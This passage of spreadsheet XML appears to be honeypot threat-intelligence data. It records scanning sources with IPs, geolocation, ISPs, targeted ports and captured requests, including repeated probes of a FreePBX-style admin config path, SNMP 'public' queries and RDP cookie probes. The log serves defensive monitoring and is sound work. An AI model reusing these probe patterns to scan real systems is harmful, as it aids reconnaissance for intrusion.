'Host': '5.182.38.84', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '66.94.127.183', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '209.145.61.177', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '185.255.123.181', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '95.164.118.29', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '95.164.21.98', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '185.250.150.39', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.60.171.39', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.253.43.207', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '103.113.68.70', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.117.64', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '193.57.136.113', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.42.176', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '45.14.244.111', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '185.234.67.80', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '156.244.37.11', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.90.63.129', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.115.66', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:482e:82da"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="278"/>
    <x v="278"/>
    <s v="NA&amp;&amp;ronald.probe.onyphe.net"/>
    <x v="0"/>
    <d v="2025-04-30T03:10:51"/>
    <d v="2024-11-28T08:24:45"/>
    <d v="2025-04-30T03:10:51"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_SMB_H15"/>
    <s v="64841&amp;&amp;1521&amp;&amp;23&amp;&amp;80&amp;&amp;6379&amp;&amp;49812&amp;&amp;389&amp;&amp;25&amp;&amp;445&amp;&amp;143&amp;&amp;8443&amp;&amp;1433&amp;&amp;NA&amp;&amp;110&amp;&amp;5432&amp;&amp;443&amp;&amp;16522&amp;&amp;1080"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="BRE"/>
    <s v="Brittany"/>
    <s v="Ille-et-Vilaine"/>
    <s v="Saint-Grégoire"/>
    <s v="2979619"/>
    <s v="35760"/>
    <s v="48.157"/>
    <s v="-1.6881"/>
    <s v="16276"/>
    <s v="OVH SAS"/>
    <s v="OVH SAS"/>
    <s v="hosting"/>
    <s v="ONYPHE"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (178.32.72.210,42999)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SMB:Incoming connection (178.32.72.210,59837)}&amp;&amp;{Data_SMB:Incoming connection (178.32.72.210,43613)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b220:48d2"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="279"/>
    <x v="279"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T03:10:24"/>
    <d v="2023-07-24T15:31:26"/>
    <d v="2025-04-30T03:10:24"/>
    <n v="3382"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_SSH_H3&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;9100&amp;&amp;14262&amp;&amp;NA&amp;&amp;47313"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="AR"/>
    <s v="Argentina"/>
    <s v="B"/>
    <s v="Buenos Aires"/>
    <s v="Partido de Berisso"/>
    <s v="Berisso"/>
    <s v="3436040"/>
    <s v="NA"/>
    <s v="-34.8715"/>
    <s v="-57.8833"/>
    <s v="22927"/>
    <s v="Telefonica de Argentina"/>
    <s v="Telefonica de Argentina"/>
    <s v="business"/>
    <s v="Telefonica de Argentina"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b329:483"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="280"/>
    <x v="280"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T03:06:10"/>
    <d v="2025-04-30T03:06:10"/>
    <d v="2025-04-30T03:06:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:1923"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="281"/>
    <x v="281"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:52:48"/>
    <d v="2025-04-30T02:52:48"/>
    <d v="2025-04-30T02:52:48"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:f2f5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="282"/>
    <x v="282"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:52:30"/>
    <d v="2025-04-30T02:52:30"/>
    <d v="2025-04-30T02:52:30"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'spamsources.fabel.dk': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="71"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:c7dc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="283"/>
    <x v="283"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:36:44"/>
    <d v="2025-04-30T02:36:44"/>
    <d v="2025-04-30T02:36:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kartal"/>
    <s v="Pendik"/>
    <s v="740616"/>
    <s v="NA"/>
    <s v="40.8994"/>
    <s v="29.2108"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b2f5:8277"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="284"/>
    <x v="284"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:36:09"/>
    <d v="2025-02-14T17:08:16"/>
    <d v="2025-04-30T02:36:09"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1"/>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None"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:ac81"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="285"/>
    <x v="285"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:30:24"/>
    <d v="2025-04-30T02:17:22"/>
    <d v="2025-04-30T02:30:24"/>
    <n v="21"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="BB Multiplay"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b60:fec8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="286"/>
    <x v="286"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:25:34"/>
    <d v="2023-07-24T20:41:23"/>
    <d v="2025-04-30T02:25:34"/>
    <n v="1978"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_SSH_H20&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_SSH_H45&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_IRC_H17&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MYSQL_H35&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_SOCKS5_H35&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_FTP_H2&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_ORACLE_H39&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_SIP_H18&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_SOCKS5_H20&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_SNMP_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;22&amp;&amp;161&amp;&amp;9100&amp;&amp;1080&amp;&amp;23&amp;&amp;389&amp;&amp;1521&amp;&amp;445&amp;&amp;6667&amp;&amp;110&amp;&amp;3389&amp;&amp;3306&amp;&amp;143&amp;&amp;5432&amp;&amp;52283&amp;&amp;1433&amp;&amp;51717&amp;&amp;5900&amp;&amp;53092&amp;&amp;NA&amp;&amp;52898&amp;&amp;21&amp;&amp;50831&amp;&amp;56573&amp;&amp;51379&amp;&amp;8443&amp;&amp;55434&amp;&amp;52370&amp;&amp;56603&amp;&amp;80&amp;&amp;54330&amp;&amp;56783&amp;&amp;60402&amp;&amp;51071&amp;&amp;443&amp;&amp;53837&amp;&amp;56302&amp;&amp;50370"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="query&amp;&amp;connection&amp;&amp;NA&amp;&amp;command&amp;&amp;stshash&amp;&amp;GET&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bmPjoPEji'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZKgSNplNZ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=stQpWr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: 